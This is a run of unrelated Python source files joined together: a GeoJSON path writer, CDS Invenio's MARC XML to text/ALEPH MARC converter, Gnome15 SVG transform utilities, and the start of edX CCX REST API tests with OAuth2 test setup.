name = df.ix[pid]["name"] if isinstance(df.ix[pid]["name"], unicode) \
else df.ix[pid]["name"].iloc[0] # take the first name in the list
geojson += ('{"type":"Feature","properties":{"id":'
+ str(pid)
+ ',"name":'
+ '"%s"' % name
+ '},"geometry":{"type":"LineString","coordinates":[')
for i, r in fr.iterrows():
c = "[{0},{1}],".format(r["lng"], r["lat"]) # geojson coordinates follow [lng, lat] formatting
geojson += c
geojson = geojson[:-1] + "]}}," # remove trailing comma of last coord.
geojson = geojson[:-1] + "]}" # remove trailing comma of last path
with open(outpath, "wt") as fout:
fout.write(geojson.encode('utf-8'))
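# A sketch of one feature built with the json module instead of manual string
# concatenation (hypothetical alternative; same [lng, lat] ordering):
#
#     import json
#     feature = {"type": "Feature",
#                "properties": {"id": int(pid), "name": name},
#                "geometry": {"type": "LineString", "coordinates": coords}}
#     json.dumps(feature)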
#-------------------------------------------------------------------------------
if __name__ == '__main__':
from optparse import OptionParser
usage = "./%prog [options] path\n\npath -- the path of a JSON file or a directory containing such files."
parser = OptionParser(usage=usage)
parser.add_option("-w",
dest="filename",
type="string",
help="write GeoJSON file to the specified path FILENAME")
(options, args) = parser.parse_args()
# terminal interface
if len(args) > 0:
from os import listdir
from os.path import isfile, abspath, join, splitext
# input path
if isdir(args[0]):
dirpath = args[0]
json_files = [abspath(join(dirpath, f)) for f in listdir(dirpath) \
if isfile(join(dirpath, f)) and splitext(f)[1] == '.json']
elif all([isfile(a) for a in args]) \
and all([a.endswith('.json') for a in args]):
json_files = [abspath(f) for f in args]
else:
raise IOError("Files must be in JSON format")
if len(json_files) == 0:
raise IOError("No JSON files within the directory: " + dirpath)
df = collect_data(json_files)
if options.filename:
write_geojson(df, options.filename)
c = {'green': "\033[92m", 'endc': "\033[0m"}
print c['green'] + "Data written to: " \
+ abspath(options.filename) + c['endc']
else:
parser.print_help()
#-------------------------------------------------------------------------------
# -*- coding: utf-8 -*-
##
## This file is part of CDS Invenio.
## Copyright (C) 2002, 2003, 2004, 2005, 2006, 2007, 2008 CERN.
##
## CDS Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## CDS Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with CDS Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""Library of functions for the xmlmarc2textmarc utility."""
from __future__ import generators
__revision__ = "$Id$"
from invenio.bibrecord import \
create_records, \
record_get_field_values, \
record_order_fields
from invenio.config import CFG_CERN_SITE, CFG_SITE_NAME
from random import randint, seed
from os.path import basename
import getopt, sys
## maximum length of an ALEPH MARC record line
CFG_MAXLEN_ALEPH_LINE = 1500
if CFG_CERN_SITE:
## This is a CERN installation. Set the organization's identifier to
## "SzGeCERN". This value will be used when adding the mandatory "003"
## ALEPH control field when translating a MARC XML record that does not
## already have the field.
CFG_ORGANIZATION_IDENTIFIER = "SzGeCERN"
else:
## This is not a CERN installation. The organization's identifier should be
## set with the appropriate value. If it is left empty, MARC XML -> ALEPH
## conversions in INSERT record and REPLACE record modes will fail.
##
## ***NOTE: SET ME!***
##
CFG_ORGANIZATION_IDENTIFIER = ""
def get_fieldname_changes():
"""Get a dictionary of CDS MARC field names to be replaced
with ALEPH fieldnames in an ALEPH MARC record.
@return: dict {'cds_fieldname' : 'replacement_aleph_fieldname',
'cds_fieldname' : 'replacement_aleph_fieldname',
[...]
}
"""
return {
'960' : 'BAS',
'961' : 'CAT',
'962' : 'LKR',
'963' : 'OWN',
'964' : 'ITM',
'970' : 'SYS',
}
def get_fields_dropped_in_aleph():
"""Get a list of fieldnames to be dropped from an ALEPH MARC record.
These fields are dropped before the function
'get_fieldname_changes' is called, so even if they
appear in the dictionary of field-name changes returned by that
function, they won't appear in the output Aleph MARC record.
@return: list [fieldname, fieldname, [...]]
"""
return [
'961',
'970',
'980',
'FFT',
]
def get_aleph_001(sysno):
"""Get a 001 string for an ALEPH MARC record, (without the SYS prefix).
@return: string
"""
return " 001 L %s" % (sysno,)
def get_aleph_FMT():
"""Get a FMT string for an ALEPH MARC record, (without the SYS prefix).
@return: string
"""
return " FMT L BK"
def get_aleph_OWN():
"""Get an "OWN$$aPUBLIC" string for an ALEPH MARC record, (without
the SYS prefix).
@return: string
"""
return " OWN L $$aPUBLIC"
def get_aleph_DEL():
"""Get a "DEL$$aY" string for an ALEPH MARC record, (without the
SYS prefix).
@return: string
"""
return " DEL L $$aY"
def get_aleph_LDR():
"""Get a LDR string for an ALEPH MARC record, (without the SYS prefix).
@return: string
"""
return " LDR L ^^^^^nam^^22^^^^^^a^4500"
def get_aleph_003():
"""Get a 003 string for an ALEPH MARC record, (without the SYS prefix).
@return: string
"""
return " 003 L %s" % CFG_ORGANIZATION_IDENTIFIER
def get_aleph_008():
"""Get a 008 string for an ALEPH MARC record, (without the SYS prefix).
@return: string
"""
return " 008 L ^^^^^^s^^^^^^^^^^^^^^^^r^^^^^000^0^eng^d"
def get_sysno_generator():
"""Create and return a generator for an ALEPH system number.
The generator yields zero-padded 9-digit strings; the sequence
ends when it reaches 1000000000.
@return: generator.
"""
sysno = ""
seed()
## make a 3-digit string for sysno's value:
for dummy in range(0, 3):
sysno += str(randint(1, 9))
sysno = int(sysno)
while sysno < 1000000000:
yield """%09d""" % sysno
sysno = sysno + 1
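## Hypothetical demonstration of the generator above (Python 2 idiom, like
## the rest of this module):
##
##     gen = get_sysno_generator()
##     gen.next() ## e.g. '000000421' -- a zero-padded 9-digit ALEPH SYS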
def create_marc_record(record, sysno, options):
"""Create a text-marc, or aleph-marc record from the contents
of "record", and return it as a string.
@param record: Internal representation of an XML MARC
record, created by bibrecord.
@param sysno: the system number to be used for the record
@param options: the options about the MARC record to be created,
as passed from command line
@return: string (MARC record, either text-marc or ALEPH marc format,
depending upon "options".
"""
out = "" ## String containing record to be printed
display_001 = 0 ## Flag used in ALEPH MARC mode to determine whether
## or not to print the "001" field
## Get a dictionary containing the names of fields to change for
## the output record:
if options["aleph-marc"] == 1:
fieldname_changes = get_fieldname_changes()
else:
fieldname_changes = {}
if options["aleph-marc"] == 1:
## Perform some ALEPH-MARC specific tasks:
## Assume that we will NOT display "001":
display_001 = 0
## Add ALEPH record headers to the output record:
if 1 not in (options["correct-mode"], options["append-mode"]):
## This is not an ALEPH "correct" or "append" record. The
## record must therefore have FMT and LDR fields. E.g.:
## 123456789 FMT L BK
## 123456789 LDR L ^^^^^nam^^22^^^^^^a^4500
out += """%(sys)s%(fmt)s
%(sys)s%(ldr)s\n""" % { 'sys' : sysno,
'fmt' : get_aleph_FMT(),
'ldr' : get_aleph_LDR()
}
if options["delete-mode"] == 1:
## This is an ALEPH 'delete' record. Add the DEL field
## then return the 'completed' record (in delete mode,
## the record only needs the leaders, and a 'DEL' field, e.g.:
## 123456789 FMT L BK
## 123456789 LDR L ^^^^^nam^^22^^^^^^a^4500
## 123456789 DEL L $$aY
out += """%(sys)s%(del)s\n""" % { 'sys' : sysno,
'del' : get_aleph_DEL()
}
return out
elif 1 in (options["insert-mode"], options["replace-mode"]):
## Either an ALEPH 'insert' or 'replace' record is being created.
## It needs to have 008 and OWN fields. E.g.:
## 123456789 008 L ^^^^^^s^^^^^^^^^^^^^^^^r^^^^^000^0^eng^d
## 123456789 OWN L $$aPUBLIC
out += """%(sys)s%(008)s\n""" % { 'sys' : sysno,
'008' : get_aleph_008()
}
## The "OWN" field should only be printed at this level if the
## MARC XML did not have an OWN (963__a) field:
if "PUBLIC" not in \
record_get_field_values(record, "963", code="a"):
## Add OWN field:
out += """%(sys)s%(own)s\n""" % { 'sys' : sysno,
'own' : get_aleph_OWN() }
if options["replace-mode"] == 1:
## In 'replace' mode, the record should have a 001 field:
display_001 = 1
## Remove fields unwanted in ALEPH MARC:
for deltag in get_fields_dropped_in_aleph():
try:
del record[deltag]
except KeyError:
## tag doesn't exist in record:
pass
## now add 001, since it is a special field:
if options["text-marc"] == 1:
try:
## get the 001 line(s):
lines_001 = create_field_lines(fieldname="001", \
field=record["001"][0], \
sysno=sysno, \
alephmarc=options["aleph-marc"])
## print the 001 line(s):
out += print_field(field_lines=lines_001, \
alephmarc=options["aleph-marc"])
except KeyError:
## no 001 field
pass
elif options["aleph-marc"] == 1:
## If desirable, build the "001" line:
if display_001 == 1:
try:
## make the 001 line(s):
line_leader = """%(sys)s """ % { 'sys' : sysno }
line_leader += """%(fieldname)s L """ % { 'fieldname' : "001" }
lines_001 = [[["", line_leader], ["", sysno]]]
## print the 001 line(s):
out += print_field(field_lines=lines_001, \
alephmarc=options["aleph-marc"])
except KeyError:
## no 001 field
pass
## Now, if running in "insert" or "replace" mode, add "003":
## 003 is a mandatory field in an ALEPH record. It contains the
## identifier for the organization that has generated the SYS (001)
## for the record. As such, it is necessary to drop any existing 003
## from the record, then add our own 003.
## First, drop the "003" field from the record:
try:
del record["003"]
except KeyError:
## There was no 003
pass
## Now add a correct 003 (if desirable):
if 1 in (options["insert-mode"], options["replace-mode"]):
out += """%(sys)s%(own)s\n""" % { 'sys' : sysno,
'own' : get_aleph_003() }
## delete 001 from the list of fields to output (if it exists):
try:
del record["001"]
except KeyError:
## There was no 001
pass
## Get the fields of this record, and order them correctly (using the same
## order as that of the original MARC XML file):
fields = []
for tag in record.keys():
for field in record[tag]:
fields.append((tag, field))
record_order_fields(fields)
## Finally, loop through all fields and display them in the record:
for field in fields:
## Should the field-name be changed?
try:
fieldname = fieldname_changes[str(field[0])]
except KeyError:
## Don't change this fieldname:
fieldname = field[0]
## get the subfields, etc, for this field:
fielddata = field[1]
## Create the MARC lines for this field:
field_lines = create_field_lines(fieldname, \
fielddata, \
sysno, \
options["aleph-marc"])
## Now create the formatted MARC lines:
out += print_field(field_lines, options["aleph-marc"])
## Return the formatted MARC record:
return out
def print_field(field_lines, alephmarc=0):
"""Create the lines of a record relating to a given field,
and return these lines as a string.
@param field_lines: A list of lists, whereby each item in
the top-level list is an instance of a field
(e.g. a "datafield" or "controlfield").
@param alephmarc: an integer flag to tell the function whether
or not the record being created is a pure text MARC
record, or an ALEPH MARC record.
@return: A string containing the record lines for the given field
"""
if type(field_lines) not in (list, tuple):
return ""
out = ""
if alephmarc == 0:
## creating a text-marc record
for line in field_lines:
## create line in text-marc mode:
for segment in line:
segment[1] = segment[1].replace(" \n", " ")
segment[1] = segment[1].replace("\n", " ")
out += "%(code)s%(value)s" % { 'code' : segment[0],
'value' : segment[1] }
out += "\n"
else:
## creating an aleph-marc record
for line in field_lines:
cur_line_len = 0
glue_count = 0
num_linesegments = len(line)
if num_linesegments > 1:
line_leader_len = len(line[0][1])
printable_line = ""
i = 1
while i < num_linesegments:
line[i][1] = line[i][1].replace(" \n", " ")
line[i][1] = line[i][1].replace("\n", " ")
cur_segment_len = len(line[i][0]) + len(line[i][1])
if (line_leader_len + cur_line_len + cur_segment_len + 2 \
+ len(str(glue_count))) > (CFG_MAXLEN_ALEPH_LINE - 25):
## adding this segment makes the line too long. It
## must be printed now with the ALEPH $$9 glue.
## How much of the current line can be printed?
space_remaining = (CFG_MAXLEN_ALEPH_LINE - 25) - \
(line_leader_len + cur_line_len + 3) \
- len(line[i][0])
if space_remaining > 0:
## there is space to add some of this line
printable_line += line[i][0] + \
line[i][1][0:space_remaining]
line[i][1] = line[i][1][space_remaining:]
## print this line:
out += """%(sys)s$$9%(glue_count)s""" \
"""%(printable_line)s\n""" \
% { 'sys' : line[0][1],
'glue_count' : str(glue_count),
'printable_line' : printable_line,
}
## update glue count, and reset printable line
glue_count += 1
printable_line = ""
cur_line_len = 0
else:
## Including this line segment, the line fits within a
## maximum line length, so add it:
printable_line += line[i][0] + line[i][1]
cur_line_len += (len(line[i][0]) + len(line[i][1]))
i += 1
## Now add to the display string, any of the line
## that remains in printable line:
if len(printable_line) > 0:
if glue_count > 0:
out += """%(sys)s$$9%(glue_count)s""" \
"""%(printable_line)s\n""" \
% { 'sys' : line[0][1],
'glue_count' : str(glue_count),
'printable_line' : printable_line
}
else:
out += """%(sys)s%(printable_line)s\n""" \
% { 'sys' : line[0][1],
'printable_line' : printable_line
}
elif num_linesegments == 1:
## strange - only a SYS?
out += "%(sys)s\n" % { 'sys' : line[0][1] }
return out
def create_field_lines(fieldname, field, sysno, alephmarc=0):
"""From the internal representation of a field, as pulled from
a record created by bibrecord, create a list of lists
whereby each item in the top-level list represents a record
line that should be created for the field, and each sublist
represents the various components that make up that line
(sysno, line label, subfields, etc...)
@param fieldname: the name for the field (e.g. 001) - string
@param field: the internal representation of the field, as
created by bibrecord - list
@param sysno: the system number to be used for the created
field - string
@param alephmarc: a flag telling the function whether a pure
text MARC or an ALEPH MARC record is being created - int
@return: list, containing the details of the created field
lines
"""
field_lines = []
field_instance_line_segments = []
out = """%(sys)s """ % { 'sys' : sysno }
out += """%(fieldname)s""" % { 'fieldname' : fieldname }
if alephmarc != 0:
## aleph marc record - format indicators properly:
out += """%(ind1)s%(ind2)s L """ \
% {
'ind1' : (field[1] not in ("", " ") and field[1]) \
or ((field[2] not in ("", " ") and "_") or (" ")),
'ind2' : (field[2] not in ("", " ") and field[2]) or (" ")
}
else:
## text marc record - when empty, indicators should appear as underscores:
out += """%(ind1)s%(ind2)s """ \
% {
'ind1' : (field[1] not in ("", " ") and field[1]) or ("_"),
'ind2' : (field[2] not in ("", " ") and field[2]) or ("_"),
}
## append field label to line segments list:
field_instance_line_segments.append(["", out])
## now, loop through the subfields (or controlfield data) and
## add each of them to the line data
subfield_label = ""
subfield_value = ""
if len(field[0]) == 0 and field[3] != "":
## this is a controlfield
if fieldname not in ("001", "002", "003", "004", \
"005", "006", "007", "008", "009"):
subfield_label = "$$_"
else:
subfield_label = ""
subfield_value = "%(subfield_value)s" % { 'subfield_value' : field[3] }
field_instance_line_segments.append([subfield_label, subfield_value])
else:
## this should be a datafield:
for subfield in field[0]:
subfield_label = """$$%(subfield_code)s""" \
% { 'subfield_code' : subfield[0] }
subfield_value = """%(subfield_value)s""" \
% { 'subfield_value' : subfield[1] }
field_instance_line_segments.append([subfield_label, \
subfield_value])
field_lines.append(field_instance_line_segments)
return field_lines
def get_sysno_from_record(record, options):
"""Function to get the system number for a record.
In the case of a pure text MARC record being created, the
sysno will be retrieved from 001 (i.e. the 'recid' will be returned).
In the case of an Aleph MARC record being created, the sysno
will be retrieved from 970__a IF this field exists. If not,
None will be returned.
@param record: the internal representation of the record
(created by bibrecord) from which the sysno is to be retrieved.
@param options: various options about the record to be created,
as obtained from the command line.
@return: a string containing a 9-digit SYSNO, -OR- None in
certain cases for an Aleph MARC record.
"""
if options["text-marc"] != 0:
vals001 = record_get_field_values(rec=record, tag="001")
if len(vals001) > 1:
## multiple values for recid is illegal!
sysno = None
elif len(vals001) < 1:
## no value for recid is illegal!
sysno = None
else:
## get recid
sysno = vals001[0]
if len(sysno) < 9:
sysno = "0"*(9-len(sysno)) + sysno
else:
vals970a = record_get_field_values(rec=record, tag="970", code="a")
if len(vals970a) > 1:
## multiple SYS is illegal - return a list of them all,
## let other functions decide what to do
return vals970a
if len(vals970a) < 1:
## no SYS
sysno = None
else:
## get SYS
sysno = vals970a[0][0:9]
return sysno
def recxml2recmarc(xmltext, options, sysno_generator=get_sysno_generator()):
"""The function that processes creating the records from
an XML string, and prints these records to the
standard output stream.
@param xmltext: An XML MARC record in string form.
@param options: Various options about the record to be
created, as passed from the command line.
@param sysno_generator: A static parameter to act as an Aleph
system number generator. Do not provide a value for this - it
will be assigned upon first call to this function.
"""
rec_count = 0 ## Counter used to record the number of the rec
## that is being processed. Used in error messages
## for the user, when a record cannot be processed
## create internal records structure from xmltext:
records = create_records(xmltext, 1, 1)
## now loop through each record, get its sysno, and convert it:
for rec_tuple in records:
rec_count += 1
## Get the record-dictionary itself from the record-tuple:
record = rec_tuple[0]
if record is None:
## if the record is None, there was probably a problem
## with the MARC XML. Display a warning message on stderr and
## move past this record:
sys.stderr.write("E: Unable to process record number %s; The XML " \
" may be broken for this record.\n" \
% str(rec_count))
continue
## From the record, get the SYS if running in ALEPH-MARC mode, or
## the recid (001) if running in TEXT-MARC mode:
sysno = get_sysno_from_record(record, options)
if sysno is None:
## No 'sysno' was found in the record:
if options["text-marc"] == 1:
## 'sysno' (001) (which is actually the recid) is mandatory
## for the creation of TEXT-MARC. Report the error and skip
## past the record:
sys.stderr.write("E: Record number %s has no 'recid' (001). " \
"This field is mandatory for the " \
"creation of TEXT MARC. The record has been " \
"skipped.\n" % str(rec_count))
continue
elif options["aleph-marc"] == 1 and \
1 in (options["append-mode"], options["delete-mode"], \
options["correct-mode"], options["replace-mode"]):
## When creating ALEPH-MARC that will be used to manipulate
## a record in some way (i.e. correct, append, delete, replace),
## the ALEPH SYS (970__a in MARC XML) is mandatory. Report the
## error and skip past the record:
sys.stderr.write("E: Record number %s has no ALEPH 'SYS' " \
"(970__a). This field is mandatory for the " \
"creation of ALEPH MARC that is used for the" \
" manipulation of records (i.e. replace, " \
"correct, append, delete). The record has " \
"been skipped.\n" % str(rec_count))
continue
elif options["aleph-marc"] == 1 and type(sysno) in (list, tuple):
## multiple values for SYS (970__a) in ALEPH-MARC mode are not
## permitted. Report the error and skip past the record:
sys.stderr.write("E: Multiple values have been found for the " \
"ALEPH SYS (970__a) in record number %s. This " \
"is not permitted when running in ALEPH-MARC " \
"mode. The record has been skipped." \
% str(rec_count))
continue
if options["aleph-marc"] == 1 and options["insert-mode"] == 1:
## Creating an ALEPH "insert" record. Since the resulting record
## should be treated as a new insert into ALEPH, any 'sysno' that
## may have been found in the MARC XML record cannot be used -
## that would be dangerous. Therefore, set 'sysno' to None and
## create a random sysno:
sysno = None
try:
sysno = sysno_generator.next()
except StopIteration:
## generator counter has overstepped the MAX ALEPH SYS!
## Without a SYS, we cannot create ALEPH MARC
sys.stderr.write("""E: Maximum ALEPH SYS has been """ \
"""reached - unable to continue.\n""")
sys.exit(1)
## No problems were encountered with SYS or recid. Display the
## translated record:
rec_out = create_marc_record(record, sysno, options)
sys.stdout.write(rec_out)
sys.stdout.flush()
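## Example usage (illustrative; the options dict is normally built by
## get_cli_options()):
## recxml2recmarc(xmltext=open("records.xml").read(),
## options={"text-marc": 1, "aleph-marc": 0, "append-mode": 0,
## "insert-mode": 0, "delete-mode": 0, "replace-mode": 0,
## "correct-mode": 0})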
def usage(exitcode=1, wmsg=""):
"""Prints usage info."""
if wmsg:
sys.stderr.write("Error: %s.\n" % wmsg)
sys.stderr.write ("""\
Usage: %s [options] marcxml_record_file
Convert an XML MARC record file to text MARC; Print to standard output stream
Command options:
--text-marc \t\t\tProduce text MARC output (default)
--aleph-marc=[a, d, i, c, r] \tProduce a ALEPH MARC output
When running in --aleph-marc mode, provide one of the following values:
\ta \t\t\t\tCreate an ALEPH "append" record
\td \t\t\t\tCreate an ALEPH "delete" record
\ti \t\t\t\tCreate an ALEPH "insert" record
\tc \t\t\t\tCreate an ALEPH "correct" record
\tr \t\t\t\tCreate an ALEPH "replace" record
General options:
-h, --help \t\t\t Print this help.
-V, --version\t\t\t Print version information.
""" % (basename(sys.argv[0]),))
sys.exit(exitcode)
def get_cli_options():
"""Get the various arguments and options from the command line and populate
a dictionary of cli_options.
@return: (tuple) of 2 elements. First element is a dictionary of cli
options and flags, set as appropriate; Second element is a list of cli
arguments.
"""
try:
opts, args = getopt.getopt(sys.argv[1:], "hV", [
"help", "version", "text-marc", "aleph-marc="])
except getopt.GetoptError, err:
usage(1, err)
options = { "append-mode" : 0,
"insert-mode" : 0,
"delete-mode" : 0,
"replace-mode" : 0,
"correct-mode" : 0,
"aleph-marc" : 0,
"text-marc" : 0
}
for opt, arg in opts:
if opt in ["-h", "--help"]:
## Display usage (help) message and exit successfully:
usage(0)
elif opt in ["-V", "--version"]:
## Display version on stdout and exit successfully:
sys.stdout.write("%s\n" % __revision__)
sys.exit(0)
elif opt == "--aleph-marc":
## Running in ALEPH-MARC mode:
options["aleph-marc"] = 1
if arg == "a":
## Create an ALEPH "APPEND" record:
options["append-mode"] = 1
elif arg == "d":
## Create an ALEPH "DELETE" record:
options["delete-mode"] = 1
elif arg == "i":
## Create an ALEPH "INSERT" record:
options["insert-mode"] = 1
elif arg == "c":
## Create an ALEPH "CORRECT" record:
options["correct-mode"] = 1
elif arg == "r":
## Create an ALEPH "REPLACE" record:
options["replace-mode"] = 1
else:
## Invalid option for ALEPH-MARC mode.
## Display usage (help) message and exit with failure:
usage(1)
elif opt == "--text-marc":
## Running in TEXT-MARC mode:
options["text-marc"] = 1
else:
## Invalid option. Display an error message to the user,
## display usage (help) message, and exit with failure:
sys.stderr.write("Bad option, %s\n" % opt)
usage(1)
if options["aleph-marc"] + options["text-marc"] > 1:
## User has specified both ALEPH-MARC and TEXT-MARC modes.
## This is not permitted, display error message, usage message, and
## exit with failure:
err_msg = "Choose either aleph-marc mode or text-marc mode - not both."
usage(1, err_msg)
elif options["aleph-marc"] + options["text-marc"] == 0:
## User has not specified whether to run in ALEPH-MARC or TEXT-MARC
## mode. Run in the default TEXT-MARC mode.
options["text-marc"] = 1
if options["aleph-marc"] == 1:
## Running in ALEPH-MARC mode. Conduct some final ALEPH-MODE-specific
## checks:
if options["append-mode"] + options["insert-mode"] \
+ options["delete-mode"] + options["replace-mode"] \
+ options["correct-mode"] != 1:
## Invalid option for ALEPH-MARC mode.
## Display error message, usage info, and exit with failure.
err_msg = "A valid mode must be supplied for aleph-marc"
usage(1, err_msg)
if 1 in (options["insert-mode"], options["replace-mode"]) and \
CFG_ORGANIZATION_IDENTIFIER.strip() == "":
## It is ILLEGAL to create an ALEPH-MARC mode INSERT or
## REPLACE record if the organization's identifier is not known.
## Write out an error mesage and exit with failure.
sys.stderr.write("Error: ***CFG_ORGANIZATION_IDENTIFIER IS NOT " \
"SET!*** Unable to create ALEPH INSERT or " \
"REPLACE records. Please inform your %s" \
" Administrator.\n" % CFG_SITE_NAME)
sys.exit(1)
## Check that a filename for the MARC XML file was provided:
if len(args) == 0:
## No arguments, therefore no XML file. Display a
## usage message, and exit with failure:
usage(1)
return (options, args)
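## Example (illustrative): invoking the script as
## "xmlmarc2textmarc --aleph-marc=i records.xml" would set
## options["aleph-marc"] = 1 and options["insert-mode"] = 1,
## with args == ["records.xml"]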
def main():
"""Main function."""
## process CLI options/arguments:
(options, args) = get_cli_options()
## Read in the XML file and process it:
xmlfile = args[0]
## open file:
try:
xmltext = open(xmlfile, 'r').read()
except IOError:
sys.stderr.write("Error: File %s not found.\n\n" % xmlfile)
usage(1)
## Process record conversion:
recxml2recmarc(xmltext=xmltext, options=options)
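## Standard CLI entry point (assumed here, as the module is clearly meant to
## be run as a script):
if __name__ == '__main__':
main()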
| 0.010184 |
# Gnome15 - Suite of tools for the Logitech G series keyboards and headsets
# Copyright (C) 2010 Brett Smith <[email protected]>
# Copyright (C) 2013 Nuno Araujo <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
SVG utilities
'''
import cairo
import g15convert
import g15pythonlang
# Logging
import logging
logger = logging.getLogger(__name__)
def rotate_element(element, degrees):
transforms = get_transforms(element)
if len(transforms) > 0:
t = transforms[0]
for i in range(1, len(transforms)):
t = t.multiply(transforms[i])
else:
t = cairo.Matrix()
t.rotate(g15convert.degrees_to_radians(degrees))
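## str(t) looks like "cairo.Matrix(xx, yx, xy, yy, x0, y0)"; dropping the
## leading "cairo.M" and prefixing "m" produces an SVG "matrix(...)" string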
ts = "m" + str(t)[7:]
element.set("transform", ts)
def get_transforms(element, position_only = False):
transform_val = element.get("transform")
transforms = []
if transform_val is not None:
start = 0
while True:
start_args = transform_val.find("(", start)
if start_args == -1:
break
## parse the name of this transform segment only
name = transform_val[start:start_args].strip()
end_args = transform_val.find(")", start_args)
if end_args == -1:
break
args = transform_val[start_args + 1:end_args].split(",")
if name == "translate":
transforms.append(cairo.Matrix(1.0, 0.0, 0.0, 1.0, float(args[0]), float(args[1])))
elif name == "matrix":
## Note: when position_only is set the full matrix is kept;
## otherwise only the translation components are used
if position_only:
transforms.append(cairo.Matrix(float(args[0]), float(args[1]), float(args[2]), float(args[3]), float(args[4]), float(args[5])))
else:
transforms.append(cairo.Matrix(1, 0, 0, 1, float(args[4]), float(args[5])))
elif name == "scale":
transforms.append(cairo.Matrix(float(args[0]), 0.0, 0.0, float(args[1]), 0.0, 0.0))
else:
logger.warning("Unsupported transform %s", name)
start = end_args + 1
return transforms
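## Example (illustrative): an element with transform="translate(10,20)"
## yields [cairo.Matrix(1.0, 0.0, 0.0, 1.0, 10.0, 20.0)]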
def get_location(element):
offsets = []
while element is not None:
x = element.get("x")
y = element.get("y")
if x is not None and y is not None:
offsets.append((float(x), float(y)))
transform_val = element.get("transform")
if transform_val is not None:
start = 0
while True:
start_args = transform_val.find("(", start)
if start_args == -1:
break
## parse the name of this transform segment only
name = transform_val[start:start_args].strip()
end_args = transform_val.find(")", start_args)
if end_args == -1:
logger.warning("Unexpected end of transform arguments")
break
args = g15pythonlang.split_args(transform_val[start_args + 1:end_args])
if name == "translate":
offsets.append((float(args[0]), float(args[1])))
elif name == "matrix":
offsets.append((float(args[4]), float(args[5])))
else:
logger.warning("Unsupported transform %s", name)
start = end_args + 1
element = element.getparent()
offsets.reverse()
x = 0
y = 0
for i in offsets:
x += i[0]
y += i[1]
return (x, y)
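## Example (illustrative): an element with x="5" y="10" inside a parent with
## transform="translate(100,50)" resolves to the location (105.0, 60.0)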
def get_actual_bounds(element, relative_to = None):
bounds = get_bounds(element)
transforms = []
t = cairo.Matrix()
t.translate(bounds[0], bounds[1])
transforms.append(t)
# If the element is a clip path and the associated clipped_node is provided, then work out the
# transforms from the parent of the clipped_node, not the clip itself
if relative_to is not None:
element = relative_to.getparent()
while element is not None:
transforms += get_transforms(element, position_only=True)
element = element.getparent()
transforms.reverse()
if len(transforms) > 0:
t = transforms[0]
for i in range(1, len(transforms)):
t = t.multiply(transforms[i])
xx, yx, xy, yy, x0, y0 = t
return x0, y0, bounds[2], bounds[3]
def get_bounds(element):
x = 0.0
y = 0.0
w = 0.0
h = 0.0
v = element.get("x")
if v != None:
x = float(v)
v = element.get("y")
if v != None:
y = float(v)
v = element.get("width")
if v != None:
w = float(v)
v = element.get("height")
if v != None:
h = float(v)
return (x, y, w, h)
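## Example (illustrative): for an element with x="5", y="10", width="40" and
## height="20", get_bounds returns (5.0, 10.0, 40.0, 20.0)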
| 0.006098 |
"""
Tests for the CCX REST APIs.
"""
import json
import math
import string
import urllib
import urlparse
from datetime import timedelta
from itertools import izip
import ddt
import mock
from ccx_keys.locator import CCXLocator
from django.conf import settings
from django.contrib.auth.models import User
from django.core.urlresolvers import Resolver404, resolve, reverse
from django.utils.timezone import now
from nose.plugins.attrib import attr
from oauth2_provider import models as dot_models
from opaque_keys.edx.keys import CourseKey
from provider.constants import CONFIDENTIAL
from provider.oauth2.models import Client, Grant
from rest_framework import status
from rest_framework.test import APITestCase
from courseware import courses
from lms.djangoapps.ccx.api.v0 import views
from lms.djangoapps.ccx.models import CcxFieldOverride, CustomCourseForEdX
from lms.djangoapps.ccx.overrides import override_field_for_ccx
from lms.djangoapps.ccx.tests.utils import CcxTestCase
from lms.djangoapps.ccx.utils import ccx_course as ccx_course_cm
from lms.djangoapps.ccx.utils import get_course_chapters
from lms.djangoapps.instructor.access import allow_access, list_with_level
from lms.djangoapps.instructor.enrollment import enroll_email, get_email_params
from student.models import CourseEnrollment
from student.roles import CourseCcxCoachRole, CourseInstructorRole, CourseStaffRole
from student.tests.factories import AdminFactory, UserFactory
USER_PASSWORD = 'test'
AUTH_ATTRS = ('auth', 'auth_header_oauth2_provider')
class CcxRestApiTest(CcxTestCase, APITestCase):
"""
Base class with common methods to be used in the test classes of this module
"""
@classmethod
def setUpClass(cls):
super(CcxRestApiTest, cls).setUpClass()
def setUp(self):
"""
Set up tests
"""
super(CcxRestApiTest, self).setUp()
# add some info about the course for easy access
self.master_course_key = self.course.location.course_key
self.master_course_key_str = unicode(self.master_course_key)
# OAUTH2 setup
# create a specific user for the application
self.app_user = app_user = UserFactory(
username='test_app_user',
email='[email protected]',
password=USER_PASSWORD
)
# add staff role to the app user
CourseStaffRole(self.master_course_key).add_users(app_user)
# adding instructor to master course.
instructor = UserFactory()
allow_access(self.course, instructor, 'instructor')
# FIXME: Testing for multiple authentication types in multiple test cases is overkill. Stop it!
self.auth, self.auth_header_oauth2_provider = self.prepare_auth_token(app_user)
self.course.enable_ccx = True
self.mstore.update_item(self.course, self.coach.id)
# making the master course chapters easily available
self.master_course_chapters = get_course_chapters(self.master_course_key)
def get_auth_token(self, app_grant, app_client):
"""
Helper method to get the oauth token
"""
token_data = {
'grant_type': 'authorization_code',
'code': app_grant.code,
'client_id': app_client.client_id,
'client_secret': app_client.client_secret
}
token_resp = self.client.post(reverse('oauth2:access_token'), data=token_data, format='multipart')
self.assertEqual(token_resp.status_code, status.HTTP_200_OK)
token_resp_json = json.loads(token_resp.content)
return '{token_type} {token}'.format(
token_type=token_resp_json['token_type'],
token=token_resp_json['access_token']
)
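# The returned value is a ready-to-use Authorization header value, e.g.
# "Bearer <access_token>" (token type and value illustrative)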
def prepare_auth_token(self, user):
"""
